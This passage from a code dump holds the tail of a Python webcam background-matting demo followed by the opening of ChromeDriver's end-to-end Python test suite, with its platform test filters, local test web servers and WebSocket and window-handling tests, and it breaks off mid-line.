parser.add_argument('--model-refine-sample-pixels', type=int, default=80_000) parser.add_argument('--model-refine-threshold', type=float, default=0.1) parser.add_argument('--hide-fps', action='store_true') parser.add_argument('--resolution', type=int, nargs=2, metavar=('width', 'height'), default=(1280, 720)) parser.add_argument('--precision', type=str, default='float32', choices=['float32', 'float16']) parser.add_argument('--backend', type=str, default='pytorch', 
choices=['pytorch', 'torchscript']) parser.add_argument('--video_device_id', type=int, default=0) args = parser.parse_args() # ----------- Utility classes ------------- # A wrapper that reads data from cv2.VideoCapture in its own thread to optimize. # Use .read() in a tight loop to get the newest frame class Camera: def __init__(self, device_id=0, width=1280, height=720): self.capture = cv2.VideoCapture(device_id) self.capture.set(cv2.CAP_PROP_FRAME_WIDTH, width) self.capture.set(cv2.CAP_PROP_FRAME_HEIGHT, height) self.width = int(self.capture.get(cv2.CAP_PROP_FRAME_WIDTH)) self.height = int(self.capture.get(cv2.CAP_PROP_FRAME_HEIGHT)) # self.capture.set(cv2.CAP_PROP_BUFFERSIZE, 2) self.success_reading, self.frame = self.capture.read() self.read_lock = Lock() self.thread = Thread(target=self.__update, args=()) self.thread.daemon = True self.thread.start() def __update(self): while self.success_reading: grabbed, frame = self.capture.read() with self.read_lock: self.success_reading = grabbed self.frame = frame def read(self): with self.read_lock: frame = self.frame.copy() return frame def __exit__(self, exec_type, exc_value, traceback): self.capture.release() # An FPS tracker that computes exponentialy moving average FPS class FPSTracker: def __init__(self, ratio=0.5): self._last_tick = None self._avg_fps = None self.ratio = ratio def tick(self): if self._last_tick is None: self._last_tick = time.time() return None t_new = time.time() fps_sample = 1.0 / (t_new - self._last_tick) self._avg_fps = self.ratio * fps_sample + (1 - self.ratio) * self._avg_fps if self._avg_fps is not None else fps_sample self._last_tick = t_new return self.get() def get(self): return self._avg_fps # Wrapper for playing a stream with cv2.imshow(). It can accept an image and return keypress info for basic interactivity. # It also tracks FPS and optionally overlays info onto the stream. 
class Displayer: def __init__(self, title, width=None, height=None, show_info=True): self.title, self.width, self.height = title, width, height self.show_info = show_info self.fps_tracker = FPSTracker() cv2.namedWindow(self.title, cv2.WINDOW_NORMAL) cv2.setWindowProperty(self.title, cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN) #fullscreen if width is not None and height is not None: cv2.resizeWindow(self.title, width, height) # Update the currently showing frame and return key press char code def step(self, image): fps_estimate = self.fps_tracker.tick() if self.show_info and fps_estimate is not None: message = f"{int(fps_estimate)} fps | {self.width}x{self.height}" cv2.putText(image, message, (10, 40), cv2.FONT_HERSHEY_SIMPLEX, 1.0, (0, 0, 0)) cv2.imshow(self.title, image) return cv2.waitKey(1) & 0xFF # --------------- Main --------------- if args.precision == 'float32': precision = torch.float32 else: precision = torch.float16 # Load model if args.backend == 'torchscript': # Load torchscript model = torch.jit.load(args.model_checkpoint) model.backbone_scale = args.model_backbone_scale model.refine_mode = 'sampling' model.refine_sample_pixels = 80_000 model = model.to(torch.device('cuda')) else: # Load pytorch if args.model_type == 'mattingbase': model = MattingBase(args.model_backbone) if args.model_type == 'mattingrefine': model = MattingRefine( args.model_backbone, args.model_backbone_scale, args.model_refine_mode, args.model_refine_sample_pixels, args.model_refine_threshold) model = model.cuda().eval().to(device='cuda', dtype=precision) model.load_state_dict(torch.load(args.model_checkpoint), strict=False) width, height = args.resolution cam = Camera(width=width, height=height, device_id=args.video_device_id) dsp = Displayer('MattingV2', cam.width, cam.height, show_info=(not args.hide_fps)) def cv2_frame_to_cuda(frame): frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB) output = to_tensor(frame).unsqueeze_(0).to(device='cuda', dtype=precision) #output = 
ToTensor()(Image.fromarray(frame)).unsqueeze_(0).cuda() return output with torch.no_grad(): while True: bgr = None bgr_green = torch.tensor([120/255, 255/255, 155/255], device='cuda').view(1, 3, 1, 1) while True: # grab bgr frame = cam.read() key = dsp.step(frame) if key == ord('b'): bgr = cv2_frame_to_cuda(cam.read()) break elif key == ord('q'): exit() while True: # matting frame = cam.read() src = cv2_frame_to_cuda(frame) pha, fgr = model(src, bgr)[:2] #res = pha * fgr + (1 - pha) * torch.ones_like(fgr) res = fgr * pha + bgr_green * (1 - pha) res = res.mul(255).byte().cpu().permute(0, 2, 3, 1).numpy()[0] res = cv2.cvtColor(res, cv2.COLOR_RGB2BGR) key = dsp.step(res) if key == ord('b'): break elif key == ord('q'): exit()
# ==== run_py_tests.py ====
#!/usr/bin/env python # Copyright 2013 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """End to end tests for ChromeDriver.""" # Note that to run Android tests you must have the following line in # .gclient (in the parent directory of src): target_os = [ 'android' ] # to get the appropriate adb version for ChromeDriver. # TODO (crbug.com/857239): Remove above comment when adb version # is updated in Devil. from __future__ import print_function from __future__ import absolute_import import base64 import json import math import optparse import os import re import shutil import socket import subprocess import sys import tempfile import threading import time import unittest import six.moves.urllib.request, six.moves.urllib.parse, six.moves.urllib.error import six.moves.urllib.request, six.moves.urllib.error, six.moves.urllib.parse import uuid import imghdr import struct from six.moves import map from six.moves import range from six.moves import zip _THIS_DIR = os.path.abspath(os.path.dirname(__file__)) _PARENT_DIR = os.path.join(_THIS_DIR, os.pardir) _CLIENT_DIR = os.path.join(_PARENT_DIR, "client") _SERVER_DIR = os.path.join(_PARENT_DIR, "server") _TEST_DIR = os.path.join(_PARENT_DIR, "test") sys.path.insert(1, _PARENT_DIR) import chrome_paths import util sys.path.remove(_PARENT_DIR) sys.path.insert(1, _CLIENT_DIR) import chromedriver import websocket_connection import webelement import webshadowroot sys.path.remove(_CLIENT_DIR) sys.path.insert(1, _SERVER_DIR) import server sys.path.remove(_SERVER_DIR) sys.path.insert(1, _TEST_DIR) import unittest_util import webserver sys.path.remove(_TEST_DIR) sys.path.insert(0,os.path.join(chrome_paths.GetSrc(), 'third_party', 'catapult', 'third_party', 'gsutil', 'third_party', 'monotonic')) from monotonic import monotonic _TEST_DATA_DIR = os.path.join(chrome_paths.GetTestData(), 'chromedriver') if util.IsLinux(): sys.path.insert(0, 
os.path.join(chrome_paths.GetSrc(), 'third_party', 'catapult', 'devil')) from devil.android import device_utils from devil.android import forwarder sys.path.insert(0, os.path.join(chrome_paths.GetSrc(), 'build', 'android')) import devil_chromium from pylib import constants _NEGATIVE_FILTER = [ # This test is too flaky on the bots, but seems to run perfectly fine # on developer workstations. 'ChromeDriverTest.testEmulateNetworkConditionsNameSpeed', 'ChromeDriverTest.testEmulateNetworkConditionsSpeed', # https://bugs.chromium.org/p/chromedriver/issues/detail?id=833 'ChromeDriverTest.testAlertOnNewWindow', # https://bugs.chromium.org/p/chromedriver/issues/detail?id=2532 'ChromeDriverPageLoadTimeoutTest.testRefreshWithPageLoadTimeout', # https://bugs.chromium.org/p/chromedriver/issues/detail?id=3517 'ChromeDriverTest.testPrint', 'ChromeDriverTest.testPrintInvalidArgument', ] _OS_SPECIFIC_FILTER = {} _OS_SPECIFIC_FILTER['win'] = [ # https://bugs.chromium.org/p/chromedriver/issues/detail?id=299 'ChromeLogPathCapabilityTest.testChromeLogPath', # https://bugs.chromium.org/p/chromium/issues/detail?id=1196363 'ChromeDownloadDirTest.testFileDownloadAfterTabHeadless', 'ChromeDownloadDirTest.testFileDownloadWithClickHeadless', 'ChromeDownloadDirTest.testFileDownloadWithGetHeadless', 'HeadlessChromeDriverTest.testNewTabDoesNotFocus', 'HeadlessChromeDriverTest.testNewWindowDoesNotFocus', 'HeadlessChromeDriverTest.testPrintHeadless', 'HeadlessChromeDriverTest.testPrintInvalidArgumentHeadless', 'HeadlessChromeDriverTest.testWindowFullScreen', 'HeadlessInvalidCertificateTest.testLoadsPage', 'HeadlessInvalidCertificateTest.testNavigateNewWindow', 'RemoteBrowserTest.testConnectToRemoteBrowserLiteralAddressHeadless', ] _OS_SPECIFIC_FILTER['linux'] = [ ] _OS_SPECIFIC_FILTER['mac'] = [ # https://bugs.chromium.org/p/chromedriver/issues/detail?id=1927 # https://crbug.com/1036636 'MobileEmulationCapabilityTest.testTapElement', # https://bugs.chromium.org/p/chromium/issues/detail?id=1011225 
'ChromeDriverTest.testActionsMultiTouchPoint', # Flaky: https://crbug.com/1156576. 'ChromeDriverTestLegacy.testContextMenuEventFired', # Flaky: https://crbug.com/1157533. 'ChromeDriverTest.testShadowDomFindElement', ] _DESKTOP_NEGATIVE_FILTER = [ # Desktop doesn't support touch (without --touch-events). 'ChromeDriverTestLegacy.testTouchSingleTapElement', 'ChromeDriverTest.testTouchDownMoveUpElement', 'ChromeDriverTestLegacy.testTouchScrollElement', 'ChromeDriverTestLegacy.testTouchDoubleTapElement', 'ChromeDriverTestLegacy.testTouchLongPressElement', 'ChromeDriverTest.testTouchFlickElement', 'ChromeDriverAndroidTest.*', ] _INTEGRATION_NEGATIVE_FILTER = [ # The following test is flaky on Windows and Mac. 'ChromeDownloadDirTest.testDownloadDirectoryOverridesExistingPreferences', # ChromeDriverLogTest tests an internal ChromeDriver feature, not needed # for integration test. 'ChromeDriverLogTest.*', # ChromeDriverPageLoadTimeoutTest is flaky, particularly on Mac. 'ChromeDriverPageLoadTimeoutTest.*', # Some trivial test cases that provide no additional value beyond what are # already tested by other test cases. 'ChromeDriverTest.testGetCurrentWindowHandle', 'ChromeDriverTest.testStartStop', # PerfTest takes a long time, requires extra setup, and adds little value # to integration testing. 'PerfTest.*', # Flaky: https://crbug.com/899919 'SessionHandlingTest.testGetSessions', # Flaky due to occasional timeout in starting Chrome 'ZChromeStartRetryCountTest.testChromeStartRetryCount', ] def _GetDesktopNegativeFilter(): filter = _NEGATIVE_FILTER + _DESKTOP_NEGATIVE_FILTER os = util.GetPlatformName() if os in _OS_SPECIFIC_FILTER: filter += _OS_SPECIFIC_FILTER[os] return filter _ANDROID_NEGATIVE_FILTER = {} _ANDROID_NEGATIVE_FILTER['chrome'] = ( _NEGATIVE_FILTER + [ # Android doesn't support switches and extensions. 
        'ChromeSwitchesCapabilityTest.*',
        'ChromeExtensionsCapabilityTest.*',
        'MobileEmulationCapabilityTest.*',
        'ChromeDownloadDirTest.*',
        # https://crbug.com/274650
        'ChromeDriverTest.testCloseWindow',
        # Most window operations don't make sense on Android.
        'ChromeDriverTest.testWindowFullScreen',
        'ChromeDriverTest.testWindowPosition',
        'ChromeDriverTest.testWindowSize',
        'ChromeDriverTest.testWindowRect',
        'ChromeDriverTest.testWindowMaximize',
        'ChromeDriverTest.testWindowMinimize',
        'ChromeLogPathCapabilityTest.testChromeLogPath',
        # Connecting to running browser is not supported on Android.
        'RemoteBrowserTest.*',
        # Don't enable perf testing on Android yet.
        'PerfTest.*',
        # Android doesn't support multiple sessions on one device.
        'SessionHandlingTest.testGetSessions',
        # Android doesn't use the chrome://print dialog.
        'ChromeDriverTest.testCanSwitchToPrintPreviewDialog',
        # Chrome 44+ for Android doesn't dispatch the dblclick event
        'ChromeDriverTest.testMouseDoubleClick',
        # Page cannot be loaded from file:// URI in Android unless it
        # is stored in device.
        'ChromeDriverTest.testCanClickAlertInIframes',
        # https://bugs.chromium.org/p/chromedriver/issues/detail?id=2081
        'ChromeDriverTest.testCloseWindowUsingJavascript',
        # Android doesn't support headless mode
        'HeadlessInvalidCertificateTest.*',
        'HeadlessChromeDriverTest.*',
        # Tests of the desktop Chrome launch process.
        'LaunchDesktopTest.*',
        # https://bugs.chromium.org/p/chromedriver/issues/detail?id=2737
        'ChromeDriverTest.testTakeElementScreenshot',
        'ChromeDriverTest.testTakeElementScreenshotPartlyVisible',
        'ChromeDriverTest.testTakeElementScreenshotInIframe',
        # setWindowBounds not supported on Android
        'ChromeDriverTest.testTakeLargeElementScreenshot',
        # https://bugs.chromium.org/p/chromedriver/issues/detail?id=2786
        'ChromeDriverTest.testActionsTouchTap',
        'ChromeDriverTest.testTouchDownMoveUpElement',
        'ChromeDriverTest.testTouchFlickElement',
        # Android has no concept of tab or window, and will always lose focus
        # on tab creation. https://crbug.com/chromedriver/3018
        'ChromeDriverTest.testNewWindowDoesNotFocus',
        'ChromeDriverTest.testNewTabDoesNotFocus',
        # Android does not support the virtual authenticator environment.
        'ChromeDriverSecureContextTest.*',
        # Covered by Desktop tests; can't create 2 browsers in Android
        'SupportIPv4AndIPv6.testSupportIPv4AndIPv6',
        # Browser context management is not supported by Android
        'ChromeDriverTest.testClipboardPermissions',
        'ChromeDriverTest.testMidiPermissions',
        'ChromeDriverTest.testMultiplePermissions',
        'ChromeDriverTest.testNewWindowSameDomainHasSamePermissions',
        'ChromeDriverTest.testPermissionStates',
        'ChromeDriverTest.testPermissionsOpaqueOriginsThrowError',
        'ChromeDriverTest.testPermissionsSameOrigin',
        'ChromeDriverTest.testPermissionsSameOriginDoesNotAffectOthers',
        'ChromeDriverTest.testPersistentStoragePermissions',
        'ChromeDriverTest.testPushAndNotificationsPermissions',
        'ChromeDriverTest.testSensorPermissions',
        'ChromeDriverTest.testSettingPermissionDoesNotAffectOthers',
        # Android does not allow changing window size
        'JavaScriptTests.*',
        # These tests are failing on Android
        # https://bugs.chromium.org/p/chromedriver/issues/detail?id=3560
        'ChromeDriverTest.testTakeLargeElementViewportScreenshot',
        'ChromeDriverTest.testTakeLargeElementFullPageScreenshot'
    ]
)
# chrome_stable: everything skipped for 'chrome', plus features not yet
# present in the stable channel build.
_ANDROID_NEGATIVE_FILTER['chrome_stable'] = (
    _ANDROID_NEGATIVE_FILTER['chrome'] + [
        # https://bugs.chromium.org/p/chromedriver/issues/detail?id=2350
        'ChromeDriverTest.testSlowIFrame',
        # https://bugs.chromium.org/p/chromedriver/issues/detail?id=2503
        'ChromeDriverTest.testGetLogOnClosedWindow',
        'ChromeDriverTest.testGetWindowHandles',
        'ChromeDriverTest.testShouldHandleNewWindowLoadingProperly',
        'ChromeDriverTest.testSwitchToWindow',
        # Feature not yet supported in this version
        'ChromeDriverTest.testGenerateTestReport',
    ]
)
# chrome_beta: same shape as chrome_stable's additions.
_ANDROID_NEGATIVE_FILTER['chrome_beta'] = (
    _ANDROID_NEGATIVE_FILTER['chrome'] + [
        # https://bugs.chromium.org/p/chromedriver/issues/detail?id=2503
        'ChromeDriverTest.testGetLogOnClosedWindow',
        'ChromeDriverTest.testGetWindowHandles',
        'ChromeDriverTest.testShouldHandleNewWindowLoadingProperly',
        'ChromeDriverTest.testSwitchToWindow',
        # Feature not yet supported in this version
        'ChromeDriverTest.testGenerateTestReport',
    ]
)
# chromium (tip-of-tree): no extra exclusions beyond 'chrome'.
_ANDROID_NEGATIVE_FILTER['chromium'] = (
    _ANDROID_NEGATIVE_FILTER['chrome'] + []
)
# WebView shell: builds on chrome_stable's filter with WebView limitations.
_ANDROID_NEGATIVE_FILTER['chromedriver_webview_shell'] = (
    _ANDROID_NEGATIVE_FILTER['chrome_stable'] + [
        # WebView doesn't support emulating network conditions.
        'ChromeDriverTest.testEmulateNetworkConditions',
        'ChromeDriverTest.testEmulateNetworkConditionsNameSpeed',
        'ChromeDriverTest.testEmulateNetworkConditionsOffline',
        'ChromeDriverTest.testEmulateNetworkConditionsSpeed',
        'ChromeDriverTest.testEmulateNetworkConditionsName',
        # WebView shell doesn't support popups or popup blocking.
        'ChromeDriverTest.testPopups',
        'ChromeDriverTest.testDontGoBackOrGoForward',
        # ChromeDriver WebView shell doesn't support multiple tabs.
        'ChromeDriverTest.testCloseWindowUsingJavascript',
        'ChromeDriverTest.testGetWindowHandles',
        'ChromeDriverTest.testSwitchToWindow',
        'ChromeDriverTest.testShouldHandleNewWindowLoadingProperly',
        'ChromeDriverTest.testGetLogOnClosedWindow',
        # The WebView shell that we test against (on KitKat) does not perform
        # cross-process navigations.
        # TODO(samuong): reenable when it does.
        'ChromeDriverPageLoadTimeoutTest.testPageLoadTimeoutCrossDomain',
        'ChromeDriverPageLoadTimeoutTest.'
            'testHistoryNavigationWithPageLoadTimeout',
        # Webview shell doesn't support Alerts.
'ChromeDriverTest.testAlert', 'ChromeDriverTest.testAlertOnNewWindow', 'ChromeDesiredCapabilityTest.testUnexpectedAlertBehaviour', 'ChromeDriverTest.testAlertHandlingOnPageUnload', 'ChromeDriverTest.testClickElementAfterNavigation', 'ChromeDriverTest.testGetLogOnWindowWithAlert', 'ChromeDriverTest.testSendTextToAlert', 'ChromeDriverTest.testUnexpectedAlertOpenExceptionMessage', # https://bugs.chromium.org/p/chromedriver/issues/detail?id=2332 'ChromeDriverTestLegacy.testTouchScrollElement', ] ) class ChromeDriverBaseTest(unittest.TestCase): """Base class for testing chromedriver functionalities.""" def __init__(self, *args, **kwargs): super(ChromeDriverBaseTest, self).__init__(*args, **kwargs) self._drivers = [] def tearDown(self): for driver in self._drivers: try: driver.Quit() except: pass def CreateDriver(self, server_url=None, server_pid=None, download_dir=None, **kwargs): if server_url is None: server_url = _CHROMEDRIVER_SERVER_URL if server_pid is None: server_pid = _CHROMEDRIVER_SERVER_PID if (not _ANDROID_PACKAGE_KEY and 'debugger_address' not in kwargs and '_MINIDUMP_PATH' in globals() and _MINIDUMP_PATH): # Environment required for minidump not supported on Android # minidumpPath will fail parsing if debugger_address is set if 'experimental_options' in kwargs: if 'minidumpPath' not in kwargs['experimental_options']: kwargs['experimental_options']['minidumpPath'] = _MINIDUMP_PATH else: kwargs['experimental_options'] = {'minidumpPath': _MINIDUMP_PATH} android_package = None android_activity = None android_process = None if _ANDROID_PACKAGE_KEY: android_package = constants.PACKAGE_INFO[_ANDROID_PACKAGE_KEY].package if _ANDROID_PACKAGE_KEY == 'chromedriver_webview_shell': android_activity = constants.PACKAGE_INFO[_ANDROID_PACKAGE_KEY].activity android_process = '%s:main' % android_package driver = chromedriver.ChromeDriver(server_url, server_pid, chrome_binary=_CHROME_BINARY, android_package=android_package, android_activity=android_activity, 
                                       android_process=android_process,
                                       download_dir=download_dir,
                                       test_name=self.id(),
                                       **kwargs)
    # Register the session so tearDown quits it even if the test fails.
    self._drivers += [driver]
    return driver

  def WaitForNewWindow(self, driver, old_handles, check_closed_windows=True):
    """Wait for at least one new window to show up in 20 seconds.

    Args:
      old_handles: Handles to all old windows before the new window is added.
      check_closed_windows: If True, assert that no windows are closed before
          the new window is added.

    Returns:
      Handle to a new window. None if timeout.
    """
    deadline = monotonic() + 20
    while monotonic() < deadline:
      handles = driver.GetWindowHandles()
      if check_closed_windows:
        self.assertTrue(set(old_handles).issubset(handles))
      new_handles = set(handles).difference(set(old_handles))
      if len(new_handles) > 0:
        # Return any one of the newly-opened window handles.
        return new_handles.pop()
      time.sleep(0.01)
    return None

  def WaitForCondition(self, predicate, timeout=5, timestep=0.1):
    """Wait for a condition to become true.

    Args:
      predicate: A function that returns a boolean value.
      timeout: Maximum number of seconds to wait.
      timestep: Seconds to sleep between predicate evaluations.

    Returns:
      True as soon as predicate() is truthy; False if the timeout elapses.
    """
    deadline = monotonic() + timeout
    while monotonic() < deadline:
      if predicate():
        return True
      time.sleep(timestep)
    return False


class ChromeDriverBaseTestWithWebServer(ChromeDriverBaseTest):
  """Base test class that also provides HTTP/HTTPS/sync test web servers."""

  @staticmethod
  def GlobalSetUp():
    # Process-wide setup: start the HTTP, sync, and (self-signed cert)
    # HTTPS servers shared by all tests in this class hierarchy.
    ChromeDriverBaseTestWithWebServer._http_server = webserver.WebServer(
        chrome_paths.GetTestData())
    ChromeDriverBaseTestWithWebServer._sync_server = webserver.SyncWebServer()
    cert_path = os.path.join(chrome_paths.GetTestData(),
                             'chromedriver/invalid_ssl_cert.pem')
    ChromeDriverBaseTestWithWebServer._https_server = webserver.WebServer(
        chrome_paths.GetTestData(), cert_path)

    def respondWithUserAgentString(request):
      return {}, """
        <html>
        <body>%s</body>
        </html>""" % request.GetHeader('User-Agent')

    def respondWithUserAgentStringUseDeviceWidth(request):
      return {}, """
        <html>
        <head>
        <meta name="viewport" content="width=device-width,minimum-scale=1.0">
        </head>
        <body>%s</body>
        </html>""" % request.GetHeader('User-Agent')

    ChromeDriverBaseTestWithWebServer._http_server.SetCallbackForPath(
        '/userAgent',
respondWithUserAgentString) ChromeDriverBaseTestWithWebServer._http_server.SetCallbackForPath( '/userAgentUseDeviceWidth', respondWithUserAgentStringUseDeviceWidth) if _ANDROID_PACKAGE_KEY: ChromeDriverBaseTestWithWebServer._device = ( device_utils.DeviceUtils.HealthyDevices()[0]) http_host_port = ( ChromeDriverBaseTestWithWebServer._http_server._server.server_port) sync_host_port = ( ChromeDriverBaseTestWithWebServer._sync_server._server.server_port) https_host_port = ( ChromeDriverBaseTestWithWebServer._https_server._server.server_port) forwarder.Forwarder.Map( [(http_host_port, http_host_port), (sync_host_port, sync_host_port), (https_host_port, https_host_port)], ChromeDriverBaseTestWithWebServer._device) @staticmethod def GlobalTearDown(): if _ANDROID_PACKAGE_KEY: forwarder.Forwarder.UnmapAllDevicePorts(ChromeDriverTest._device) ChromeDriverBaseTestWithWebServer._http_server.Shutdown() ChromeDriverBaseTestWithWebServer._https_server.Shutdown() @staticmethod def GetHttpUrlForFile(file_path): return ChromeDriverBaseTestWithWebServer._http_server.GetUrl() + file_path class ChromeDriverTestWithCustomCapability(ChromeDriverBaseTestWithWebServer): def testEagerMode(self): send_response = threading.Event() def waitAndRespond(): send_response.wait(10) self._sync_server.RespondWithContent('#') thread = threading.Thread(target=waitAndRespond) self._http_server.SetDataForPath('/top.html', """ <html><body> <div id='top'> <img src='%s'> </div> </body></html>""" % self._sync_server.GetUrl()) eager_driver = self.CreateDriver(page_load_strategy='eager') thread.start() start_eager = monotonic() eager_driver.Load(self._http_server.GetUrl() + '/top.html') stop_eager = monotonic() send_response.set() eager_time = stop_eager - start_eager self.assertTrue(eager_time < 9) thread.join() def testDoesntWaitWhenPageLoadStrategyIsNone(self): class HandleRequest(object): def __init__(self): self.sent_hello = threading.Event() def slowPage(self, request): self.sent_hello.wait(2) return {}, 
""" <html> <body>hello</body> </html>""" handler = HandleRequest() self._http_server.SetCallbackForPath('/slow', handler.slowPage) driver = self.CreateDriver(page_load_strategy='none') self.assertEquals('none', driver.capabilities['pageLoadStrategy']) driver.Load(self._http_server.GetUrl() + '/chromedriver/empty.html') start = monotonic() driver.Load(self._http_server.GetUrl() + '/slow') self.assertTrue(monotonic() - start < 2) handler.sent_hello.set() self.WaitForCondition(lambda: 'hello' in driver.GetPageSource()) self.assertTrue('hello' in driver.GetPageSource()) def testUnsupportedPageLoadStrategyRaisesException(self): self.assertRaises(chromedriver.InvalidArgument, self.CreateDriver, page_load_strategy="unsupported") def testGetUrlOnInvalidUrl(self): # Make sure we don't return 'chrome-error://chromewebdata/' (see # https://bugs.chromium.org/p/chromedriver/issues/detail?id=1272). # Block DNS resolution for all hosts so that the navigation results # in a DNS lookup error. driver = self.CreateDriver( chrome_switches=['--host-resolver-rules=MAP * ~NOTFOUND']) self.assertRaises(chromedriver.ChromeDriverException, driver.Load, 'http://invalid/') self.assertEquals('http://invalid/', driver.GetCurrentUrl()) class ChromeDriverWebSocketTest(ChromeDriverBaseTestWithWebServer): @staticmethod def composeWebSocketUrl(server_url, session_id): return server_url.replace('http', 'ws') + '/session/' + session_id def testDefaultSession(self): driver = self.CreateDriver() self.assertFalse('webSocketUrl' in driver.capabilities) self.assertRaises(Exception, websocket_connection.WebSocketConnection, _CHROMEDRIVER_SERVER_URL, driver.GetSessionId()) def testWebSocketUrlFalse(self): driver = self.CreateDriver(web_socket_url=False) self.assertFalse('webSocketUrl' in driver.capabilities) self.assertRaises(Exception, websocket_connection.WebSocketConnection, _CHROMEDRIVER_SERVER_URL, driver.GetSessionId()) def testWebSocketUrlTrue(self): driver = self.CreateDriver(web_socket_url=True) 
self.assertTrue('webSocketUrl' in driver.capabilities) self.assertNotEqual(None, driver.GetSessionId()) self.assertEquals(driver.capabilities['webSocketUrl'], self.composeWebSocketUrl(_CHROMEDRIVER_SERVER_URL, driver.GetSessionId())) websocket = websocket_connection.WebSocketConnection( _CHROMEDRIVER_SERVER_URL, driver.GetSessionId()) self.assertNotEqual(None, websocket) def testWebSocketUrlInvalid(self): self.assertRaises(chromedriver.InvalidArgument, self.CreateDriver, web_socket_url='Invalid') def testWebSocketOneConnectionPerSession(self): driver = self.CreateDriver(web_socket_url=True) websocket = websocket_connection.WebSocketConnection( _CHROMEDRIVER_SERVER_URL, driver.GetSessionId()) self.assertNotEqual(None, websocket) self.assertRaises(Exception, websocket_connection.WebSocketConnection, _CHROMEDRIVER_SERVER_URL, driver.GetSessionId()) def testWebSocketCommandReturnsNotSupported(self): driver = self.CreateDriver(web_socket_url=True) websocket = websocket_connection.WebSocketConnection( _CHROMEDRIVER_SERVER_URL, driver.GetSessionId()) websocket.SendCommand({"SOME": "COMMAND"}) message = websocket.ReadMessage() self.assertEqual("not supported", message) def testWebSocketInvalidSessionId(self): driver = self.CreateDriver(web_socket_url=True) self.assertRaises(Exception, websocket_connection.WebSocketConnection, _CHROMEDRIVER_SERVER_URL, "random_session_id_123") def testWebSocketClosedCanReconnect(self): driver = self.CreateDriver(web_socket_url=True) websocket = websocket_connection.WebSocketConnection( _CHROMEDRIVER_SERVER_URL, driver.GetSessionId()) self.assertNotEqual(None, websocket) websocket.Close() websocket2 = websocket_connection.WebSocketConnection( _CHROMEDRIVER_SERVER_URL, driver.GetSessionId()) self.assertNotEqual(None, websocket2) class ChromeDriverTest(ChromeDriverBaseTestWithWebServer): """End to end tests for ChromeDriver.""" def setUp(self): self._driver = self.CreateDriver() def testStartStop(self): pass def 
testGetComputedAttributes(self): self._driver.Load( self.GetHttpUrlForFile('/chromedriver/accessibility.html')) firstHeaderElement = self._driver.FindElement( 'css selector', '#first-header') self.assertEquals(firstHeaderElement.GetComputedLabel(), 'header content') self.assertEquals(firstHeaderElement.GetComputedRole(), 'heading') def testGetComputedAttributesForIgnoredNode(self): self._driver.Load( self.GetHttpUrlForFile('/chromedriver/accessibility.html')) ignoredHeaderElement = self._driver.FindElement( 'css selector', '#ignored-header') # GetComputedLabel for ignored node should return empty string. self.assertEquals(ignoredHeaderElement.GetComputedLabel(), '') self.assertEquals(ignoredHeaderElement.GetComputedRole(), 'none') def testGetComputedAttributesForUnrenderedNode(self): self._driver.Load( self.GetHttpUrlForFile('/chromedriver/accessibility.html')) unrenderedHeaderElement = self._driver.FindElement( 'css selector', '#unrendered-header') # GetComputedLabel for unrendered node should return empty string. self.assertEquals(unrenderedHeaderElement.GetComputedLabel(), '') self.assertEquals(unrenderedHeaderElement.GetComputedRole(), 'none') def testLoadUrl(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) def testGetCurrentWindowHandle(self): self._driver.GetCurrentWindowHandle() # crbug.com/p/chromedriver/issues/detail?id=2995 exposed that some libraries # introduce circular function references. Functions should not be serialized # or treated as an object - this test checks that circular function # definitions are allowed (despite how they are not spec-compliant. 
def testExecuteScriptWithSameFunctionReference(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript("""function copyMe() { return 1; } Function.prototype.foo = copyMe; const obj = {}; obj['buzz'] = copyMe; return obj;""") def _newWindowDoesNotFocus(self, window_type='window'): current_handles = self._driver.GetWindowHandles() self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/focus_blur_test.html')) new_window = self._driver.NewWindow(window_type=window_type) text = self._driver.FindElement('css selector', '#result').GetText() self.assertTrue(new_window['handle'] not in current_handles) self.assertTrue(new_window['handle'] in self._driver.GetWindowHandles()) self.assertEquals(text, 'PASS') def testNewWindowDoesNotFocus(self): self._newWindowDoesNotFocus(window_type='window') def testNewTabDoesNotFocus(self): self._newWindowDoesNotFocus(window_type='tab') def testCloseWindow(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html')) old_handles = self._driver.GetWindowHandles() self._driver.FindElement('css selector', '#link').Click() new_window_handle = self.WaitForNewWindow(self._driver, old_handles) self.assertNotEqual(None, new_window_handle) self._driver.SwitchToWindow(new_window_handle) self.assertEquals(new_window_handle, self._driver.GetCurrentWindowHandle()) self.assertRaises(chromedriver.NoSuchElement, self._driver.FindElement, 'css selector', '#link') close_returned_handles = self._driver.CloseWindow() self.assertRaises(chromedriver.NoSuchWindow, self._driver.GetCurrentWindowHandle) new_handles = self._driver.GetWindowHandles() self.assertEquals(close_returned_handles, new_handles) for old_handle in old_handles: self.assertTrue(old_handle in new_handles) for handle in new_handles: self._driver.SwitchToWindow(handle) self.assertEquals(handle, self._driver.GetCurrentWindowHandle()) close_handles = self._driver.CloseWindow() # CloseWindow quits the session if on the last window. 
if handle is not new_handles[-1]: from_get_window_handles = self._driver.GetWindowHandles() self.assertEquals(close_handles, from_get_window_handles) def testCloseWindowUsingJavascript(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html')) old_handles = self._driver.GetWindowHandles() self._driver.FindElement('css selector', '#link').Click() new_window_handle = self.WaitForNewWindow(self._driver, old_handles) self.assertNotEqual(None, new_window_handle) self._driver.SwitchToWindow(new_window_handle) self.assertEquals(new_window_handle, self._driver.GetCurrentWindowHandle()) self.assertRaises(chromedriver.NoSuchElement, self._driver.FindElement, 'css selector', '#link') self._driver.ExecuteScript('window.close()') with self.assertRaises(chromedriver.NoSuchWindow): self._driver.GetTitle() def testGetWindowHandles(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html')) old_handles = self._driver.GetWindowHandles() self._driver.FindElement('css selector', '#link').Click() self.assertNotEqual(None, self.WaitForNewWindow(self._driver, old_handles)) def testGetWindowHandlesInPresenceOfSharedWorker(self): self._driver.Load( self.GetHttpUrlForFile('/chromedriver/shared_worker.html')) old_handles = self._driver.GetWindowHandles() def testSwitchToWindow(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html')) self.assertEquals( 1, self._driver.ExecuteScript('window.name = "oldWindow"; return 1;')) window1_handle 